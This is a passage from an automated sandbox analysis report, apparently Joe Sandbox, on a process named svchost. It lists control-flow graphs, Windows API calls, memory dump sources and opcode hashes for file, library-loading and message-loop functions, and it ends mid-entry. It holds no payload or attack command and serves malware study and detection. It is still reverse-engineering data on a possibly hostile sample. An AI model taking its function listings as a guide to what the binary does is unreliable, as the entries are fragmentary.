                                                            control_flow_graph 993 8398e0-839901 call 84ec50 996 839903-839906 993->996 997 83990c 993->997 996->997 998 839908-83990a 996->998 999 83990e-83991f 997->999 998->999 1000 839921 999->1000 1001 839927-839931 999->1001 1000->1001 1002 839933 1001->1002 1003 839936-839943 call 836edb 1001->1003 1002->1003 1006 839945 1003->1006 1007 83994b-83996a CreateFileW 1003->1007 1006->1007 1008 8399bb-8399bf 1007->1008 1009 83996c-83998e GetLastError call 83bb03 1007->1009 1010 8399c3-8399c6 1008->1010 1013 8399c8-8399cd 1009->1013 1018 839990-8399b3 CreateFileW GetLastError 1009->1018 1012 8399d9-8399de 1010->1012 1010->1013 1016 8399e0-8399e3 1012->1016 1017 8399ff-839a10 1012->1017 1013->1012 1015 8399cf 1013->1015 1015->1012 1016->1017 1019 8399e5-8399f9 SetFileTime 1016->1019 1020 839a12-839a2a call 840602 1017->1020 1021 839a2e-839a39 1017->1021 1018->1010 1022 8399b5-8399b9 1018->1022 1019->1017 1020->1021 1022->1010
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00837760,?,00000005,?,00000011), ref: 0083995F
                                                            • GetLastError.KERNEL32(?,?,00837760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0083996C
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00837760,?,00000005,?), ref: 008399A2
                                                            • GetLastError.KERNEL32(?,?,00837760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008399AA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00837760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008399F9
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0
                                                            • Opcode ID: 1b2419b2a2493f367717be878500f220a143c9961f357a8e167e6c78d9d09ac3
                                                            • Instruction ID: 7cd4912e0b457180606f9ab26ea413ecd211cf4475fca60e0fe0708cffe2c9af
                                                            • Opcode Fuzzy Hash: 1b2419b2a2493f367717be878500f220a143c9961f357a8e167e6c78d9d09ac3
                                                            • Instruction Fuzzy Hash: A531C030544745AFE7209F24CC86B9ABF98FB84320F200B19F9E1D61D1D7E4A958CBD2
                                                            Function 0084B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1052 84b568-84b581 PeekMessageW 1053 84b583-84b597 GetMessageW 1052->1053 1054 84b5bc-84b5be 1052->1054 1055 84b5a8-84b5b6 TranslateMessage DispatchMessageW 1053->1055 1056 84b599-84b5a6 IsDialogMessageW 1053->1056 1055->1054 1056->1054 1056->1055
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0084B579
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084B58A
                                                            • IsDialogMessageW.USER32(00010410,?), ref: 0084B59E
                                                            • TranslateMessage.USER32(?), ref: 0084B5AC
                                                            • DispatchMessageW.USER32(?), ref: 0084B5B6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0
                                                            • Opcode ID: 01ca0e6d225b2c16844107e4ed158b8522d333639a8813f5455e97603e5f9a80
                                                            • Instruction ID: cb326daedca19e8ac87aaf5331211a15af42cfc0d01a4e2677f259fb32e0182f
                                                            • Opcode Fuzzy Hash: 01ca0e6d225b2c16844107e4ed158b8522d333639a8813f5455e97603e5f9a80
                                                            • Instruction Fuzzy Hash: C1F0DA71A0122ABB8B20AFE6EC4DDDBBFBCFE053917044416B919D2010EB74D605CBB0
                                                            Function 0084ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1057 84abab-84abca GetClassNameW 1058 84abf2-84abf4 1057->1058 1059 84abcc-84abe1 call 841fbb 1057->1059 1061 84abf6-84abf9 SHAutoComplete 1058->1061 1062 84abff-84ac01 1058->1062 1064 84abf1 1059->1064 1065 84abe3-84abef FindWindowExW 1059->1065 1061->1062 1064->1058 1065->1064
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 0084ABC2
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 0084ABF9
                                                              • Part of subcall function 00841FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0083C116,00000000,.exe,?,?,00000800,?,?,?,00848E3C), ref: 00841FD1
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0084ABE9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: EDIT
                                                            • API String ID: 4243998846-3080729518
                                                            • Opcode ID: 76363df5f7a04e8343832c1a65860bbbbc95a27a142905aaf23617846ca7003a
                                                            • Instruction ID: 76c7bde40cacec0ae2a23bb79c0ccf1a242ab34b4156f39f56296d1b4a91643e
                                                            • Opcode Fuzzy Hash: 76363df5f7a04e8343832c1a65860bbbbc95a27a142905aaf23617846ca7003a
                                                            • Instruction Fuzzy Hash: BDF0823274162C76DB3067649C0AF9B766CFB46B50F494012BA45E61C0DB60DE4585B6
                                                            Function 0084AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0084081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00840836
                                                              • Part of subcall function 0084081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083F2D8,Crypt32.dll,00000000,0083F35C,?,?,0083F33E,?,?,?), ref: 00840858
                                                            • OleInitialize.OLE32(00000000), ref: 0084AC2F
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0084AC66
                                                            • SHGetMalloc.SHELL32(00878438), ref: 0084AC70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll
                                                            • API String ID: 3498096277-3360196438
                                                            • Opcode ID: be69507eb425df85f1eb72af3f6e419e5f036f3788d8c07c963972a394a5b9f7
                                                            • Instruction ID: 52a695aaed146955b4c92079d32c587765dc87623749281b9ee73cba6e194479
                                                            • Opcode Fuzzy Hash: be69507eb425df85f1eb72af3f6e419e5f036f3788d8c07c963972a394a5b9f7
                                                            • Instruction Fuzzy Hash: 4CF0F9B5900209ABCB10AFA9D9499AFFBFCFF84701F04415AA415E2251DBB856058FA1
                                                            Function 00839785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1070 839785-839791 1071 839793-83979b GetStdHandle 1070->1071 1072 83979e-8397b5 ReadFile 1070->1072 1071->1072 1073 839811 1072->1073 1074 8397b7-8397c0 call 8398bc 1072->1074 1075 839814-839817 1073->1075 1078 8397c2-8397ca 1074->1078 1079 8397d9-8397dd 1074->1079 1078->1079 1082 8397cc 1078->1082 1080 8397df-8397e8 GetLastError 1079->1080 1081 8397ee-8397f2 1079->1081 1080->1081 1083 8397ea-8397ec 1080->1083 1084 8397f4-8397fc 1081->1084 1085 83980c-83980f 1081->1085 1086 8397cd-8397d7 call 839785 1082->1086 1083->1075 1084->1085 1088 8397fe-839807 GetLastError 1084->1088 1085->1075 1086->1075 1088->1085 1090 839809-83980a 1088->1090 1090->1086
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00839795
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 008397AD
                                                            • GetLastError.KERNEL32 ref: 008397DF
                                                            • GetLastError.KERNEL32 ref: 008397FE
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            • Opcode ID: f3dc5fa471fdc713d0c93f4860640d3e46a2fd4879f949dad7cc42766c05d41f
                                                            • Instruction ID: ba294cdd1e0051535b8babe98b5c9eaf12f4543e74b5eda905cd8358d536d825
                                                            • Opcode Fuzzy Hash: f3dc5fa471fdc713d0c93f4860640d3e46a2fd4879f949dad7cc42766c05d41f
                                                            • Instruction Fuzzy Hash: 62116131924608EBDF205F65C804A6A37A9FBC2365F108939F496C52D0E7F4DE44DBE2
                                                            Function 0085AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1091 85ad34-85ad48 1092 85ad55-85ad70 LoadLibraryExW 1091->1092 1093 85ad4a-85ad53 1091->1093 1095 85ad72-85ad7b GetLastError 1092->1095 1096 85ad99-85ad9f 1092->1096 1094 85adac-85adae 1093->1094 1099 85ad7d-85ad88 LoadLibraryExW 1095->1099 1100 85ad8a 1095->1100 1097 85ada1-85ada2 FreeLibrary 1096->1097 1098 85ada8 1096->1098 1097->1098 1101 85adaa-85adab 1098->1101 1102 85ad8c-85ad8e 1099->1102 1100->1102 1101->1094 1102->1096 1103 85ad90-85ad97 1102->1103 1103->1101
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0083D710,00000000,00000000,?,0085ACDB,0083D710,00000000,00000000,00000000,?,0085AED8,00000006,FlsSetValue), ref: 0085AD66
                                                            • GetLastError.KERNEL32(?,0085ACDB,0083D710,00000000,00000000,00000000,?,0085AED8,00000006,FlsSetValue,00867970,FlsSetValue,00000000,00000364,?,008598B7), ref: 0085AD72
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0085ACDB,0083D710,00000000,00000000,00000000,?,0085AED8,00000006,FlsSetValue,00867970,FlsSetValue,00000000), ref: 0085AD80
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 1be95383643826e09a1d6d4e6d09aabd3f8c9c2fa823e0eec782cc33cbdcbc4f
                                                            • Instruction ID: 0fb9ea50627236f7b1a447a65516cec72706608f5579f2c77ba5441ab4375e44
                                                            • Opcode Fuzzy Hash: 1be95383643826e09a1d6d4e6d09aabd3f8c9c2fa823e0eec782cc33cbdcbc4f
                                                            • Instruction Fuzzy Hash: 5C012B36611236AFC7256F68EC84A577BB8FF057A3B160720FD06D7650D721D809C6E1
                                                            Function 00839F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0083D343,00000001,?,?,?,00000000,0084551D,?,?,?), ref: 00839F9E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0084551D,?,?,?,?,?,00844FC7,?), ref: 00839FE5
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0083D343,00000001,?,?), ref: 0083A011
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$Handle
                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            • Opcode ID: 49a6c4fac9f4920b92d8cd91ed5f132f2a74d06cf36dc6c69e5ee225ea1d00d4
                                                            • Instruction ID: 321471b0ee8295c1cb0508c397cc0677920d4986bfdc213c48e4c4172675b8e3
                                                            • Opcode Fuzzy Hash: 49a6c4fac9f4920b92d8cd91ed5f132f2a74d06cf36dc6c69e5ee225ea1d00d4
                                                            • Instruction Fuzzy Hash: B3317C31208749EFDB18CF24D818B6AB7A5FBC4715F044919F981DB290CBB5AD48CBE2
                                                            Function 0083A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0083C27E: _wcslen.LIBCMT ref: 0083C284
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A2D9
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A30C
                                                            • GetLastError.KERNEL32(?,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A329
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            • Opcode ID: caa0e238f6f15520155dc378ccdf6f90509251fed9fff3c0f512a9c9497dba57
                                                            • Instruction ID: a4e3cabddd68446da2ec55559637e47785865097e7932fe73b0b2188d4b02649
                                                            • Opcode Fuzzy Hash: caa0e238f6f15520155dc378ccdf6f90509251fed9fff3c0f512a9c9497dba57
                                                            • Instruction Fuzzy Hash: 0001FC31500214AAEF29AB758C49FFE3348FF89780F044414F981E6181D754CA81C6F7
                                                            Function 0085B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0085B8B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: b212676ea4e2b584d1856ee653e056a79d9e7f9f01dbd8dad0cb42f5cc266e73
                                                            • Instruction ID: ac5216a07e9e10e7ba817738625e9865c153c1303711607d87fe31269968627e
                                                            • Opcode Fuzzy Hash: b212676ea4e2b584d1856ee653e056a79d9e7f9f01dbd8dad0cb42f5cc266e73
                                                            • Instruction Fuzzy Hash: D341FC7050439C9EDB228E18CC84BF6BFA9FB55305F1404EDD999C6142E3359A49CF61
                                                            Function 0085AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0085AFDD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: 89da91a9a14e992d580a0e26a1052f75586a95150615706b631581ebee14220f
                                                            • Instruction ID: d7ea0388b9d9706f222644bc11b5d306e7e0174d52526ba7ffe64dab771d62df
                                                            • Opcode Fuzzy Hash: 89da91a9a14e992d580a0e26a1052f75586a95150615706b631581ebee14220f
                                                            • Instruction Fuzzy Hash: 8D010C3250410DBBCF169F94DC06EEE7FA2FF08755F024254FE14A5260CA768931EB91
                                                            Function 0085AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0085A56F), ref: 0085AF55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: b896ce047746ea9a4156b8edfca00125b365e66e48234d5c9a1f589f66ebdd61
                                                            • Instruction ID: 0349f70aa044a2e9c63ee74fb0b7133dacfcc03758e1ed89ae8b8155400dcc2f
                                                            • Opcode Fuzzy Hash: b896ce047746ea9a4156b8edfca00125b365e66e48234d5c9a1f589f66ebdd61
                                                            • Instruction Fuzzy Hash: 56F0B43164520CBFCB165F54CC02C9D7FA1FF05B12B024158FD18EA360DA755E1097C6
                                                            Function 0085ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
                                                            • Opcode ID: 1cde08be7ea9daba1a21ded5f15a336e9b529aba6ea2b1e2e7c62bc64b1e86bb
                                                            • Instruction ID: 295fe65534be2237467d469c908f74444a00a55ec4f10276cf73458160b53505
                                                            • Opcode Fuzzy Hash: 1cde08be7ea9daba1a21ded5f15a336e9b529aba6ea2b1e2e7c62bc64b1e86bb
                                                            • Instruction Fuzzy Hash: 00E0E531645218BBC715AB69DC0296EBFA5FB15722B020299FD15E7340CDB85E0086D6
                                                            Function 0085BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0085B7BB: GetOEMCP.KERNEL32(00000000,?,?,0085BA44,?), ref: 0085B7E6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0085BA89,?,00000000), ref: 0085BC64
                                                            • GetCPInfo.KERNEL32(00000000,0085BA89,?,?,?,0085BA89,?,00000000), ref: 0085BC77
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: 98bfd0b6c5bda37c2d75271b01d4a06127a75340d434687f776f5521e41d2f99
                                                            • Instruction ID: 46cdac1cdf15a03126e9dd13105c8a344123fa13894252c0fa7cc45b84ebbf1f
                                                            • Opcode Fuzzy Hash: 98bfd0b6c5bda37c2d75271b01d4a06127a75340d434687f776f5521e41d2f99
                                                            • Instruction Fuzzy Hash: 68513674A002499FDB208F75C8816BABBF5FF61306F1844AED896CB252D735994DCB90
                                                            Function 00839A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00839A50,?,?,00000000,?,?,00838CBC,?), ref: 00839BAB
